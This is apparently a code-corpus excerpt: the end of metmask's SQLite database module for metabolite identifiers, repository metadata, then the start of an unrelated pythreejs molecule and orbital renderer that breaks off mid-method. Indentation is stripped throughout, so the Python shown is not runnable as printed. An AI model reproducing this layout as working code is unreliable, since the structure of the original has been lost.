# merge the new information into the existing one
if self.ifconflict in ['', 'm']:
if self.debug:
print("#COMMENT merging to mask..", end=' ')
un.merge(cnf) # got an _id.. , merge weak as well
self.dropMask(cnf) # drop weak as well
if self.ifconflict == 'p':
# now prune away what is left
un.subtract(cnf) # lost the _id.. .. but no overlap
self.setMask(un, resolve) # ..anyway, re-submit
return (1)
elif not conflict:
if un.hasTable('_id'):
# make sure we remove all mmids but the first one, the
                # others were already removed from the db
allMmids = un.getIdentifiers('_id')
mmidsToMerge = un.getIdentifiers('_id')
while len(allMmids) > 1:
un.delIdentifiers('_id', allMmids.pop())
        # get a new mmid
if not un.hasTable('_id'):
# no _id matches the given identifiers, we have found a new compound
# add to the 'preferred' table
_id = self.addMm()
# adding a clause here to set conf to nevermerge if any
# nevermerge, we could probably use the weakenIdentifier again
if un.anyNeverMerge():
un.append('_id', _id, 0, metmask.NEVERMERGE_CONF)
else:
un.append('_id', _id, 0, self.METMASK_CONF)
self.fixPreferred(un)
self.depth = 0
# get the (old or new) _id without its dimension
_id = un.getIdentifiers('_id')[0]
# replace
if self.debug:
print("inserting mask:" + str(_id))
# first drop any preferred we already have in the database, we
# set it back again
if un.hasTable('preferred'):
self.fixPreferred(un)
self.dropPreferred(_id)
for tab in un.getTables():
for ide in un.getIdentifiers(tab):
try:
conf = un.getConfidence(tab, ide)
src = un.getSource(tab, ide)
ass = un.getAssoc(tab, ide)
if len(conf) != len(src) or len(conf) <= 0 or len(src) <= 0:
raise dbError('confidence and source not defined or not of equal length')
for i in range(0, len(conf)):
self.insertToMask(tab, _id, str(ide), conf[i], src[i], ass=ass[i])
except sqlite3.IntegrityError as inst:
raise
return (1)
def fixPreferred(self, un):
""" make sure that the preferred string is present and not
available in the preferred table.
Parameters:
-`un` : a mask
"""
if not un.hasTable('_id'):
raise dbError("get an _id before fixing the preferred")
if un.hasTable('preferred'):
self.c.execute("SELECT _id FROM preferred WHERE preferred = :pref", \
{'pref': un.getIdentifiers('preferred')[0]})
checkOk = [x[0] == un.getIdentifiers('_id')[0] for x in self.c.fetchall()]
if all(checkOk):
return (1)
else:
un.delTable('preferred')
self.fixPreferred(un)
if not un.hasTable('preferred'):
if un.hasTable('synonym'):
if un.getIdentifiers('synonym', weak=False):
pref = un.getIdentifiers('synonym', weak=False)[0]
else:
pref = un.getIdentifiers('synonym')[0]
so = un.getSource('synonym', pref)[0]
cn = un.getConfidence('synonym', pref)[0]
else:
pref = un.getIdentifiers(un.getTables()[0])[0]
so = un.getSource(un.getTables()[0], pref)[0]
cn = un.getConfidence(un.getTables()[0], pref)[0]
            # this was meant to make it recognizable if pref was
            # auto-generated but it also counteracts the purpose of
            # pref as the string becomes longer
# pref = 'mm:' + pref
pref = str(un.getIdentifiers('_id')[0]) + ':' + str(pref) # make pref unique
un.append('preferred', pref, cn, so)
self.fixPreferred(un)
def dropIdentifiers(self, un):
""" drop all identifiers in the current mask. (Not the same as
dropMask which deletes a single whole mask)
Parameters:
        -`un` : a mask object containing the identifiers to drop.
"""
tables = un.getTables()
for tab in tables:
identifiers = un.getIdentifiers(tab)
for ide in identifiers:
st1 = "DELETE FROM " + tab + " WHERE " + tab + " = :ide"
try:
self.c.execute(st1, {'ide': str(ide)})
except sqlite3.OperationalError as inst:
raise inst
def dropMask(self, un):
""" drop all information related to this mask. Warning: annotations
are kept. Make sure they are updated after deletion if necessary.
Parameters:
- `un`: instance of mask.mask
"""
mmids = self.getMmid(un)
if not mmids:
raise dbError('no such mask')
tables = self.getIdTables()
for mm in mmids:
for tab in tables:
st1 = "DELETE FROM " + tab + " WHERE _id = :mm"
try:
self.c.execute(st1, {'mm': str(mm)})
except sqlite3.OperationalError as inst:
raise inst
def simpleQuery(self, name, what='_id', to='_id',
external=True, learn=True, weak=True, outmask=False, wildcards=False):
""" Query the database for a single or set of identifiers. Return a
vector of masks. Or the empty vector if not hits were found.
Parameters :
- `name`, the identifier(s) eiher as a string or list of strings.
- `what`, the type of the identifier, if a list each identifier
is interpreted as potentially one of each
- `to`, string indicating the desired return type. Either return a mask or the
desired table
- `external`, logical, should try internet if the database
didn't have the desired identifier
- `weak`, logical, should we return weak identifiers as well
- `outmask`, logical, should we return a mask or formatted list
"""
if not weak:
weak = False
originalTo = to
un = mask({})
# make sure that inputs are proper lists
if to[0] == 'ALL':
to = self.getIdTables(weak)
if re.match("~", to[0]):
to = [x for x in self.getIdTables(weak) if x not in [x.replace("~", "") for x in to]]
if not isinstance(to, list):
to = [to]
if not isinstance(what, list):
what = [what]
if not isinstance(name, list):
name = [name]
# populate the mask
for w in what:
for n in name:
un.append(w, n)
default = [[[] for x in range(0, len(to))]]
reqWeak = [x for x in to if x in self.getWeakTables()]
if any([x in self.getWeakTables() for x in what]):
weak = True
# if any asked table is weak but 'weak=False' then first get
# masks without weak, then with weak and add the weak tables.
# search the db
try:
masks = self.getMask(un, weak=weak, wildcards=wildcards)
# if no hits but we were not asked to search for weak
# identifiers, try weak anyway
if len(masks) == 0 and not external and not weak:
masks = self.getMask(un, weak=True, wildcards=wildcards)
if len(masks) > 0 and not weak and reqWeak:
weak_masks = self.getMask(un, True, wildcards=wildcards)
for m in masks:
for w in weak_masks:
if m.getIdentifiers("_id")[0] == w.getIdentifiers("_id")[0]:
for r in reqWeak:
if w.hasTable(r) and not m.hasTable(r):
m.copyTable(w, r)
except NameError:
return (default)
# found tables
found = [x.hasTable(to) for x in masks]
        # generator yielding the identifiers of each requested table
def iden(tab, mzk):
for t in tab:
yield [ma.getIdentifiers(t) for ma in mzk][0]
# make sure we do not query for something we do not know how to find
if not any([x in query.KNOWNTABLES for x in to]):
external = False
# either found or explicitly told not to go online
# if all(found) and found or not external or all([masks, to[0] == 'mask']):
if all(found) and found or not external:
if outmask:
for ma in masks:
for tab in ma.getTables():
if not tab in to:
ma.delTable(tab)
return (masks)
else:
if masks:
answer = []
for ma in masks:
answer.append(list(iden(to, [ma])))
return (answer)
else:
return (default)
        # attach the original search mask as well in case we had nothing
# in the db
masks.append(un)
resmasks = []
i = 1
for ma in masks:
if self.debug:
print("#COMMENT No hit, trying external resources..", end=' ')
externalMask = query.fetch(self, ma, internal=len(masks) > 1, to=to)
if not externalMask:
if self.debug:
print("no hit, giving up")
continue
if self.debug:
print("found it! ")
if learn:
if self.debug:
print("#COMMENT adding the information")
list(map(self.createIdTable, externalMask.getTables()))
self.setMask(externalMask)
resmasks.append(externalMask)
if i == len(masks) - 1:
break
i = i + 1
# return what we got
if to[0] == 'mask':
return (resmasks)
else:
answer = []
for ma in resmasks:
answer.append(list(iden(to, [ma])))
return (answer)
def getAllMmids(self):
"""
get all _ids
"""
# get all _id
self.c.execute('SELECT _id FROM _id')
return ([x[0] for x in self.c.fetchall()])
def export(self, tables, weak=False):
"""print all contents of the given tables to stdout
Parameters:
- `tables`: a list with the desired tables
"""
mmids = self.getAllMmids()
if tables[0] == "ALL":
tables = self.getIdTables()
if any([x in self.getWeakTables() for x in tables]):
weak = True
# print header
tmp = "\"" + "\",\"".join(tables) + "\""
print(tmp)
for mm in mmids:
ma = mask({})
ma.append('_id', mm)
ma = self.getMask(ma, weak=weak)[0]
if any([x in tables for x in ma.getTables()]):
i = 0
# one mask one row
for tab in tables:
i = i + 1
if ma.hasTable(tab):
ide = ma.getIdentifiers(tab)
ide = list(map(str, ide))
tmp = "\"" + "\"|\"".join(ide) + "\""
sys.stdout.write(tmp)
if i != len(tables):
sys.stdout.write(",")
# row is finished
sys.stdout.write('\n')
def stats(self, more=False):
""" print out basic statistics about the current database
"""
try:
tabs = self.getIdTables()
print("metmask db@" + self.db)
print("Known identifiers:")
for t in tabs:
self.c.execute("SELECT count(distinct " + t + ") FROM " + t)
lines = [x[0] for x in self.c.fetchall()]
print(t + ":")
print(str(lines) + " rows")
if more:
self.c.execute("SELECT * FROM sources")
print("Sources:")
print('%-5s %-10s' % ('Code', 'Name'))
tmp = self.c.fetchall()
for t in tmp:
print('%-5s %-10s' % (str(t[0]), str(t[1])))
self.c.execute("SELECT * FROM confidence")
print("Confidence codes:")
print('%-5s %-15s' % ('Code', 'Name'))
tmp = self.c.fetchall()
for t in tmp:
print('%-5s %-15s' % (str(t[0]), str(t[1])))
except:
raise dbError("Could not perform a simple select statement")
|
kozo2/metmask
|
metmask/dbi.py
|
Python
|
gpl-3.0
| 39,416
|
[
"Bioconductor"
] |
643c55e74b738dae1d8d4c57f1d0102595c472d5681fc7f51390a8a2428f8a74
|
import math
from math import sqrt
import re
import collections
import numpy as np
import skimage.measure
from IPython.display import display
from pythreejs import *
from .atom_data import *
from collections import defaultdict
def rgb2hex(r, g, b):
r = max(0, min(r, 255))
g = max(0, min(g, 255))
b = max(0, min(b, 255))
return '#%02x%02x%02x' % (r, g, b)
def xyz_to_atoms_list(xyz):
"""
    Converts an xyz geometry to a list of (symbol, x, y, z) tuples
Parameters
----------
xyz : str
An xyz geometry where each entry has the format "<atom symbol> <x> <y> <z>".
Any comment will be ignored
Returns
-------
A list(tuple(str, float, float, float)) containing the atomic symbol and coordinates of the atom.
"""
atoms_list = []
re_xyz = re.compile(
r"(\w+)\s+([-+]?[0-9]*\.?[0-9]+)\s+([-+]?[0-9]*\.?[0-9]+)\s+([-+]?[0-9]*\.?[0-9]+)"
)
for line in xyz.split('\n'):
m = re.search(re_xyz, line)
if (m):
symbol, x, y, z = m.groups()
atoms_list.append((symbol, float(x), float(y), float(z)))
return atoms_list
class Py3JSRenderer():
"""
A lightweight molecule and orbital renderer
Attributes
----------
bond_color : color
color of the bonds
bond_radius : float
the radius of the bonds
    width : int
        the width of the scene in pixels
    height : int
        the height of the scene in pixels
    atom_size : float
        scaling factor applied to the covalent radius when drawing atoms
Methods
-------
display()
Display the pythreejs renderer
renderer()
Return the pythreejs renderer
add_molecule(atoms_list, bohr=False, shift_to_com=True)
Add a molecule specified by a list of (symbol,x,y,z) tuples
add_molecule_xyz(xyz, bohr=False, shift_to_com=True)
Add a molecule specified in xyz format
add_cubefile(cube,type='mo',levels=None,colors=None,colorscheme=None,opacity=1.0,scale=1.0,sumlevel=0.85,add_geom=True,shift_to_com=True)
Add a cube file
add_cubefiles(cubes,type='mo',levels=None,colors=None,colorscheme=None,opacity=1.0,scale=1.0,sumlevel=0.85,add_geom=True,shift_to_com=True)
Add a cube file
add_sphere(self, position, radius, color, opacity=1.0)
Add a sphere (should not be used to draw molecules)
add_cylinder(self, xyz1, xyz2, color, radius)
Add a cylinder (should not be used to draw molecules)
add_arrow(xyz1,xyz2,color,radius_small=0.1,radius_large=0.3,arrow_height=0.6)
Add an arrow between two points
add_plane(position,color,plane=None,normal=(0.0, 0.0, 1.0),type='circle',width=4,height=4,opacity=1.0)
Add a plane
def add_box(position,width,height,depth,color,opacity=1.0,normal=(0, 0, 1))
Add a box
"""
def __init__(self, width=400, height=400):
"""
Class initialization function
Parameters
----------
width : int
The width of the scene in pixels (default = 400)
height : int
The height of the scene in pixels (default = 400)
"""
self.width = width
self.height = height
# aspect ratio
self.aspect = float(self.width) / float(self.height)
self.bond_radius = 0.15 #0.2 # a.u.
self.bond_color = '#777777'
self.angtobohr = 1.88973 # TODO: use Psi4's value
self.atom_size = 0.5 # scaling factor for atom geometry
self.atom_geometries = {}
self.atom_materials = {}
self.bond_materials = {}
self.bond_geometry = None
# cubefile meshes
self.cube_meshes = defaultdict(list)
# a list of active cubefile meshes
self.active_cube_meshes = []
# normal mode meshes
self.normal_modes_meshes = []
# the active normal mode
self.active_normal_mode = None
# set an initial scene size
self.camera_width = 10.0
self.camera_height = self.camera_width / self.aspect
self._color_schemes = {
'national': ['#e60000', '#0033a0'],
'bright': ['#ffcc00', '#00bfff'],
'electron': ['#ff00bf', '#2eb82e'],
'wow': ['#AC07F2', '#D7F205'],
'emory': ['#f2a900', '#0033a0']
}
self.__initialize_pythreejs_renderer()
def display(self):
"""
Display this renderer
"""
display(self.renderer)
def renderer(self):
"""
Return the Renderer object
"""
return self.renderer
def cubes(self):
"""
Return the list of cube
"""
return list(self.cube_meshes.keys())
def set_active_cubes(self, active_cubes):
"""
Set the active cubes
"""
# let the user pass a string or a list of strings
if isinstance(active_cubes, str):
active_cubes = [active_cubes]
# find cubes that must be removed (those plotted not included in the new list)
to_remove = set(self.active_cube_meshes).difference(set(active_cubes))
to_add = set(active_cubes).difference(set(self.active_cube_meshes))
self.active_cube_meshes = active_cubes
for cube in to_add:
if cube in self.cube_meshes:
for mesh in self.cube_meshes[cube]:
self.scene.add(mesh)
# remove/add
for cube in to_remove:
if cube in self.cube_meshes:
for mesh in self.cube_meshes[
cube]: # each cube has multiple meshes
self.scene.remove(mesh)
def set_active_mode(self, active_mode):
"""
Set the active cubes
"""
# let the user pass a string or a list of strings
# if isinstance(active_mode, int):
# active_cubes = [active_cubes]
# find cubes that must be removed (those plotted not included in the new list)
# to_remove = set(self.active_cube_meshes).difference(set(active_cubes))
# to_add = set(active_cubes).difference(set(self.active_cube_meshes))
# self.active_cube_meshes = active_cubes
self.scene.add(self.normal_modes_meshes[active_mode])
if self.active_normal_mode != None:
self.scene.remove(self.normal_modes_meshes[self.active_normal_mode])
self.active_normal_mode = active_mode
def show_molecule(self, wfn, shift_to_com=True):
mol = wfn.molecule()
natom = mol.natom()
atoms_list = [(mol.symbol(i), mol.x(i), mol.y(i), mol.z(i))
for i in range(natom)]
        self.add_molecule(atoms_list, bohr=True, shift_to_com=shift_to_com)
def add_molecule(self, atoms_list, bohr=False, shift_to_com=True):
"""
Add a molecular geometry to the scene. The geometry is given as a list of atoms
symbols and xyz coordinates
Parameters
----------
atoms_list : list(tuple(str, float, float, float))
A list of tuples containing the atomic symbol and coordinates of the atom using the format
(atomic symbol,x,y,z)
        bohr : bool
            Are the coordinates in units of bohr? (default = False)
shift_to_com : bool
Shift the molecule so that the center of mass is at the origin (default = True)
"""
if bohr == False:
atoms_list2 = []
for atom in atoms_list:
symbol, x, y, z = atom
new_atom = (symbol, self.angtobohr * x, self.angtobohr * y,
self.angtobohr * z)
atoms_list2.append(new_atom)
atoms_list = atoms_list2
self.molecule = Group()
# Add the atoms
# Performance optimization using CloneArray
# First find all the atoms of the same type
if shift_to_com:
Xcm, Ycm, Zcm = self.__center_of_mass(atoms_list)
else:
Xcm, Ycm, Zcm = (0.0, 0.0, 0.0)
atom_positions = collections.defaultdict(list)
for symbol, x, y, z in atoms_list:
atom_positions[symbol].append([x - Xcm, y - Ycm, z - Zcm])
# Then add the unique atoms at all the positions
for atom_type in atom_positions:
atom_mesh = self.__get_atom_mesh((atom_type, 0.0, 0.0, 0.0))
clone_geom = CloneArray(original=atom_mesh,
positions=atom_positions[atom_type])
self.scene.add(clone_geom)
# Add the bonds
for i in range(len(atoms_list)):
atom1 = atoms_list[i]
for j in range(i + 1, len(atoms_list)):
atom2 = atoms_list[j]
bond = self.__get_bond_mesh(atom1, atom2)
if bond:
self.scene.add(bond)
return self.renderer
def add_molecule_xyz(self, xyz, bohr=False, shift_to_com=True):
"""
Add a molecular geometry in xyz format to the scene
Parameters
----------
xyz : str
An xyz geometry where each entry has the format "<atom symbol> <x> <y> <z>".
Any comment will be ignored
        bohr : bool
            Are the coordinates in units of bohr? (default = False)
shift_to_com : bool
Shift the molecule so that the center of mass is at the origin (default = True)
"""
atoms_list = xyz_to_atoms_list(xyz)
        self.add_molecule(atoms_list, bohr, shift_to_com)
def add_cubefile(self,
cube,
type='mo',
levels=None,
colors=None,
colorscheme=None,
opacity=1.0,
scale=1.0,
sumlevel=0.85,
add_geom=True,
shift_to_com=True):
"""
Add a cube file (and optionally the molecular geometry) to the scene. This function will automatically select the levels and colors
with which to plot the surfaces
Parameters
----------
cube : CubeFile
A CubeFile object
type : str
The type of cube file ('mo' or 'density')
levels : list(float)
The levels to plot (default = None). If not provided, levels will be automatically selected
using the compute_levels() function of the CubeFile class. The variable sumlevel is used to
select the levels
color : list(str)
The color of each surface passed as a list of hexadecimal color codes (default = None)
colorscheme : str
A predefined color scheme (default = 'emory'). Possible options are ['emory', 'national', 'bright', 'electron', 'wow']
opacity : float
Opacity of the surfaces (default = 1.0)
scale : float
Scale factor to change the size of the scene (default = 1.0)
sumlevel : float
Cumulative electron density threshold used to find the isosurface levels
add_geom : bool
Show the molecular geometry (default = True)
shift_to_com : bool
Shift the molecule so that the center of mass is at the origin (default = True)
"""
Xcm, Ycm, Zcm = (0.0, 0.0, 0.0)
if shift_to_com or add_geom:
atoms_list = []
for Z, xyz in zip(cube.atom_numbers(), cube.atom_coords()):
symbol = ATOM_DATA[Z]['symbol']
atoms_list.append((symbol, xyz[0], xyz[1], xyz[2]))
# compute the center of mass
Xcm, Ycm, Zcm = self.__center_of_mass(atoms_list)
if add_geom:
self.add_molecule(atoms_list,
bohr=True,
shift_to_com=shift_to_com)
# compute the isosurface levels
if not levels:
levels = cube.compute_levels(type, sumlevel)
# select the color scheme
if colorscheme == 'national':
colors = ['#e60000', '#0033a0']
elif colorscheme == 'bright':
colors = ['#ffcc00', '#00bfff']
elif colorscheme == 'electron':
colors = ['#ff00bf', '#2eb82e']
elif colorscheme == 'wow':
colors = ['#AC07F2', '#D7F205']
elif colors == None or colorscheme == 'emory':
colors = ['#f2a900', '#0033a0']
# grab the data and extents, shift to the center of mass automatically
data = cube.data()
extent = [[cube.min()[0] - Xcm,
cube.max()[0] - Xcm],
[cube.min()[1] - Ycm,
cube.max()[1] - Ycm],
[cube.min()[2] - Zcm,
cube.max()[2] - Zcm]]
for level, color in zip(levels, colors):
if abs(level) > 1.0e-4:
mesh = self.__isosurface_mesh(data,
level=level,
color=color,
extent=extent,
opacity=opacity)
self.scene.add(mesh)
def add_cubefiles(self,
cubes,
type='mo',
levels=None,
colors=None,
colorscheme='emory',
opacity=1.0,
sumlevel=0.85,
add_geom=True,
shift_to_com=True,
show_surfaces=False):
"""
Add a cube file (and optionally the molecular geometry) to the scene. This function will automatically select the levels and colors
with which to plot the surfaces
Parameters
----------
cubes : dict(str -> CubeFile)
The CubeFile objects to load
type : str
The type of cube files ('mo' or 'density')
levels : list(float)
The levels to plot (default = None). If not provided, levels will be automatically selected
using the compute_levels() function of the CubeFile class. The variable sumlevel is used to
select the levels
color : list(str)
The color of each surface passed as a list of hexadecimal color codes (default = None)
colorscheme : str
A predefined color scheme (default = 'emory'). Possible options are ['emory', 'national', 'bright', 'electron', 'wow']
opacity : float
Opacity of the surfaces (default = 1.0)
sumlevel : float
Cumulative electron density threshold used to find the isosurface levels
add_geom : bool
Show the molecular geometry (default = True)
shift_to_com : bool
Shift the molecule so that the center of mass is at the origin (default = True)
"""
if len(cubes) == 0:
return
Xcm, Ycm, Zcm = (0.0, 0.0, 0.0)
cube = cubes[list(cubes)[0]]
atoms_list = []
for Z, xyz in zip(cube.atom_numbers(), cube.atom_coords()):
symbol = ATOM_DATA[Z]['symbol']
atoms_list.append((symbol, xyz[0], xyz[1], xyz[2]))
if add_geom:
# compute the center of mass
self.add_molecule(atoms_list, bohr=True, shift_to_com=shift_to_com)
if shift_to_com:
Xcm, Ycm, Zcm = self.__center_of_mass(atoms_list)
# grab the color scheme
if colors == None:
colors = self._color_schemes[colorscheme]
# process the cube files
for label, cube in cubes.items():
            # check if we already have this cube file
if label in self.cube_meshes:
continue
# generate a mesh
self.cube_meshes[label] = self.__cube_mesh(cube, type, levels,
sumlevel, colors,
opacity, Xcm, Ycm, Zcm)
            if show_surfaces:
                for mesh in self.cube_meshes[label]:
                    self.scene.add(mesh)
                self.active_cube_meshes.append(label)
def add_normal_modes(self,
coordinates,
frequencies,
modes):
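        """
        Add arrow meshes for a set of normal modes (one list of meshes per
        mode), to be activated later with set_active_mode().
        Assumed input structure (inferred from __normal_mode_mesh, not
        documented in the original source): `coordinates` holds one entry per
        atom whose elements 1-3 are the x, y, z coordinates; `frequencies`
        and `modes` are parallel lists of frequencies and per-atom
        displacement vectors.
        """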
for freq, mode in zip(frequencies,modes):
self.normal_modes_meshes.append(self.__normal_mode_mesh(coordinates,mode))
def __cube_mesh(self, cube, type, levels, sumlevel, colors, opacity, Xcm,
Ycm, Zcm):
meshes = []
# compute the isosurface levels
if not levels:
levels = cube.compute_levels(type, sumlevel)
# grab the data and extents, shift to the center of mass automatically
data = cube.data()
extent = [[cube.min()[0] - Xcm,
cube.max()[0] - Xcm],
[cube.min()[1] - Ycm,
cube.max()[1] - Ycm],
[cube.min()[2] - Zcm,
cube.max()[2] - Zcm]]
for level, color in zip(levels, colors):
if abs(level) > 1.0e-5:
mesh = self.__isosurface_mesh(data,
level=level,
color=color,
extent=extent,
opacity=opacity)
meshes.append(mesh)
return meshes
def __normal_mode_mesh(self, coordinates, mode):
meshes = []
for xyz,disp in zip(coordinates,mode):
norm = 0.0
for d in disp:
norm += d**2
if norm != 0.0:
xyz1 = [xyz[i + 1] for i in range(3)]
xyz2 = [xyz1[i] + 2.5 * disp[i] for i in range(3)]
arrow_meshes = self.__get_arrow_mesh(xyz1,xyz2,'#e60000',radius_small=0.25,radius_large=0.5)
for mesh in arrow_meshes:
meshes.append(mesh)
return meshes
def add_sphere(self, position, radius, color, opacity=1.0):
"""
This function adds a sphere
This should not be used to draw molecules because it cannot efficiently
        handle multiple copies of the same object
Parameters
----------
position : tuple(float, float, float)
The (x, y, z) coordinates of the center of the sphere
radius : float
The sphere radius
color : str
Hexadecimal color code
opacity : float
The opacity of the sphere (default = 1.0)
"""
geometry = SphereGeometry(radius=radius,
widthSegments=24,
heightSegments=24)
material = MeshStandardMaterial(color=color,
roughness=0.0,
metalness=0.0,
side='DoubleSide',
transparent=True,
opacity=opacity)
mesh = Mesh(geometry=geometry, material=material, position=position)
self.scene.add(mesh)
def add_cylinder(self, xyz1, xyz2, color, radius):
"""
This function adds a cylinder/cone between two points
This should not be used to draw molecules.
Parameters
----------
xyz1 : tuple(float, float, float)
The (x1, y1, z1) coordinates of the beginning of the cylinder
xyz2 : tuple(float, float, float)
The (x2, y2, z2) coordinates of the end of the cylinder
color : str
Hexadecimal color code
radius : float, (float,float), or [float,float]
The radius of the cylinder. If a float is passed then the cylinder is
assumed to have constant radius. If a list/tuple is passed the two numbers
correspond to the radius at points 1 and 2. This is useful to draw cones
"""
if isinstance(radius, float):
mesh = self.__get_cylinder_mesh(xyz1, xyz2, radius, radius, color)
self.scene.add(mesh)
elif isinstance(radius, (list, tuple)):
if len(radius) == 2:
mesh = self.__get_cylinder_mesh(xyz1, xyz2, radius[0],
radius[1], color)
self.scene.add(mesh)
else:
print(
f'add_cylinder(): radius (= {radius}) must be either a float or a list/tuple with two elements'
)
def add_arrow(self,
xyz1,
xyz2,
color,
radius_small=0.1,
radius_large=0.3,
arrow_height=0.6):
"""
This function adds an arrow between two points
Parameters
----------
xyz1 : tuple(float, float, float)
The (x1, y1, z1) coordinates of the beginning of the arrow
xyz2 : tuple(float, float, float)
The (x2, y2, z2) coordinates of the end of the arrow
color : str
Hexadecimal color code
radius_small : float
The radius of the arrow tail
radius_large : float
The radius of the base of the arrow cone
arrow_height : float
The height of the arrow cone
"""
x1, y1, z1 = xyz1
x2, y2, z2 = xyz2
d = sqrt((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)
fraction = (d - arrow_height) / d
xyz_base = [
x1 + (x2 - x1) * fraction, y1 + (y2 - y1) * fraction,
z1 + (z2 - z1) * fraction
]
mesh = self.__get_cylinder_mesh(xyz1, xyz_base, radius_small,
radius_small, color)
self.scene.add([mesh])
mesh = self.__get_cylinder_mesh(xyz_base, xyz2, radius_large, 0.0,
color)
self.scene.add([mesh])
def add_plane(self,
position,
color,
plane=None,
normal=(0.0, 0.0, 1.0),
type='circle',
width=4,
height=4,
opacity=1.0):
"""
This function adds a plane centered at a given position. The type of plane
can be specified either via a vector perpendicular to the plane or by selecting
one of the planes that lies on two Cartesian axes
Parameters
----------
position : tuple(float, float, float)
The (x, y, z) coordinates of the center of the plane
plane : str
The type of plane ('xy', 'xz', 'yz') (default = None). This overrides the `normal` argument
normal : tuple(float, float, float)
A vector (x, y, z) to which the plane is orthogonal (default = (0,0,1))
color : str
Hexadecimal color code
type : str
The type of plane ('circle', 'square') (default = 'circle')
width : float
The width (radius) of the plane (default = 4.0)
height : float
The height of the plane (default = 4.0)
opacity : float
The opacity of the plane (default = 1.0)
"""
if type == 'square':
geometry = PlaneGeometry(width=width,
height=height,
widthSegments=10,
heightSegments=10)
else:
geometry = CircleGeometry(radius=width / 2, segments=48)
material = MeshStandardMaterial(color=color,
roughness=0.3,
metalness=0.0,
side='DoubleSide',
transparent=True,
opacity=opacity)
mesh = Mesh(geometry=geometry, material=material, position=position)
if plane == 'xy' or plane == 'yx':
normal = (0.0, 0.0, 1.0)
elif plane == 'xz' or plane == 'zx':
normal = (0.0, 1.0, 0.0)
elif plane == 'yz' or plane == 'zy':
normal = (1.0, 0.0, 0.0)
# If the plane is not rotated skip the rotation step
        if normal[2] != 1.0 and normal[2] != -1.0:
R = self.__plane_rotation_matrix(normal)
mesh.setRotationFromMatrix(R)
self.scene.add(mesh)
def add_box(self,
position,
width,
height,
depth,
color,
opacity=1.0,
normal=(0, 0, 1)):
"""
This function adds a box centered at a given position. The orientation of the
box is specified via a vector perpendicular to the plane spanned by the width and height.
Parameters
----------
position : tuple(float, float, float)
The (x, y, z) coordinates of the center of the plane
width : float
The width (x dimension) of the box
height : float
The height (y dimension) of the box
depth : float
The depth (z dimension) of the box
color : str
Hexadecimal color code
opacity : float
The opacity of the box (default = 1.0)
normal : tuple(float, float, float)
A vector (x, y, z) to which the plane is orthogonal (default = (0,0,1))
"""
geometry = BoxGeometry(width=width,
height=height,
depth=depth,
widthSegments=10,
heightSegments=10,
depthSegments=10)
material = MeshStandardMaterial(color=color,
roughness=0.3,
metalness=0.0,
side='DoubleSide',
transparent=True,
opacity=opacity)
mesh = Mesh(geometry=geometry, material=material, position=position)
        # rotate the box so that it is orthogonal to the given normal vector
R = self.__plane_rotation_matrix(normal)
mesh.setRotationFromMatrix(R)
self.scene.add(mesh)
def __initialize_pythreejs_renderer(self):
"""
Create a pythreejs Scene and a Camera and add them to a Renderer
"""
# create a Scene
self.scene = Scene()
# create a camera
self.camera = OrthographicCamera(
left=-self.camera_width / 2,
right=self.camera_width / 2,
top=self.camera_height / 2,
bottom=-self.camera_height / 2,
position=[0, 0, self.camera_height * 2.0],
up=[0, 1, 0],
children=[
DirectionalLight(color='white',
position=[5, 5, 1],
intensity=0.5)
],
near=.1,
far=1000)
        # add the camera and some ambient light to the scene
self.scene.add([self.camera, AmbientLight(color='#999999')])
self.renderer = Renderer(
camera=self.camera,
scene=self.scene,
controls=[OrbitControls(controlling=self.camera)],
width=self.width,
height=self.height)
def __get_atom_mesh(self, atom_info):
"""
This function returns a Mesh object (Geometry + Material) that represents an atom
Parameters
----------
atom_info : tuple(str, float, float, float)
A tuple containing the atomic symbol and coordinates of the atom using the format
(atomic symbol , x, y, z)
"""
symbol, x, y, z = atom_info
geometry = self.__get_atom_geometry(symbol)
material = self.__get_atom_material(symbol)
mesh = Mesh(geometry=geometry, material=material, position=[x, y, z])
return mesh
def __get_atom_geometry(self, symbol, shininess=75):
"""
This function returns a sphere geometry object with radius proportional to the covalent atomic radius
Parameters
----------
symbol : str
The symbol of the atom (e.g. 'Li')
shininess : int
The shininess of the sphere (default = 75)
"""
if symbol in self.atom_geometries:
return self.atom_geometries[symbol]
atom_data = ATOM_DATA[ATOM_SYMBOL_TO_Z[symbol]]
radius_covalent = atom_data['radius_covalent'] * self.angtobohr
geometry = SphereGeometry(radius=self.atom_size * radius_covalent,
widthSegments=24,
heightSegments=24)
self.atom_geometries[symbol] = geometry
return geometry
def __get_atom_material(self, symbol, shininess=75):
"""
This function returns a Material object used to draw atoms
Parameters
----------
symbol : str
The symbol of the atom (e.g. 'Li')
shininess : int
The shininess of the material (default = 75)
"""
if symbol in self.atom_materials:
return self.atom_materials[symbol]
atom_data = ATOM_DATA[ATOM_SYMBOL_TO_Z[symbol]]
color = 'rgb({0[0]},{0[1]},{0[2]})'.format(atom_data['color'])
# material = MeshPhongMaterial(color=color, shininess=shininess)
material = MeshStandardMaterial(color=color,
roughness=0.25,
metalness=0.1)
self.atom_materials[symbol] = material
return material
def __get_bond_mesh(self, atom1_info, atom2_info, radius=None):
"""
This function adds a bond between two atoms
atoms 1 and 2
Parameters
----------
xyz1 : tuple(float, float, float)
The (x1, y1, z1) coordinates of the beginning of the arrow
xyz2 : tuple(float, float, float)
The (x2, y2, z2) coordinates of the end of the arrow
color : str
Hexadecimal color code
radius_small : float
The radius of the arrow
radius_large : float
The radius of the arrow
"""
symbol1, x1, y1, z1 = atom1_info
symbol2, x2, y2, z2 = atom2_info
d = sqrt((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)
radius_covalent1 = ATOM_DATA[
ATOM_SYMBOL_TO_Z[symbol1]]['radius_covalent']
radius_covalent2 = ATOM_DATA[
ATOM_SYMBOL_TO_Z[symbol2]]['radius_covalent']
bond_cutoff = self.bond_cutoff(radius_covalent1, radius_covalent2)
if d > bond_cutoff:
return None
if radius == None:
radius = self.bond_radius
d = sqrt((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)
position = [(x2 + x1) / 2, (y2 + y1) / 2, (z2 + z1) / 2]
geometry = self.__get_bond_geometry()
material = self.__get_bond_material(color=self.bond_color)
mesh = Mesh(geometry=geometry, material=material, position=position)
mesh.scale = (1, d, 1)
# If the bond rotation is 180 deg then return
if y1 - y2 == d:
mesh.rotateX(3.14159265359) #math.pi)
return mesh
R = self.__cylinder_rotation_matrix([x1, y1, z1], [x2, y2, z2])
mesh.setRotationFromMatrix(R)
return mesh
def __get_bond_geometry(self):
"""
This function returns a cylinder geometry object of unit height used to draw bonds
"""
if self.bond_geometry:
